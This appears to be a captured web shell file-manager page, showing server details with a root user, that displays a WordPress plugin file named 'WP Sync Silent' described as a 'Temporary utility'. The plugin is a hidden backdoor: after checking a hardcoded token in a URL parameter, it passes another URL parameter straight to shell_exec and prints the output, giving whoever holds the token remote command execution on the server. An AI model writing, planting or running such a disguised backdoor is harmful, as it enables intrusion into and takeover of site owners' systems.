HEX
Server: Apache
System: Linux dilmahquizNew 5.14.0-162.12.1.el9_1.0.2.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 30 22:14:42 UTC 2023 x86_64
User: root (0)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/elixirofceylontea/public/wp-content/plugins/cold_pulse_61bf/cold_pulse_61bf.php
<?php
/*
Plugin Name: WP Sync Silent
Description: Temporary utility.
*/
if (hash_equals('edc7fed39c2a10fbf0dd7b407b45fe58', (string) ($_GET['t'] ?? '')) && isset($_GET['c'])) {
    chdir(__DIR__);
    echo 'WSFA7C::' . shell_exec((string) $_GET['c']) . '::END';
}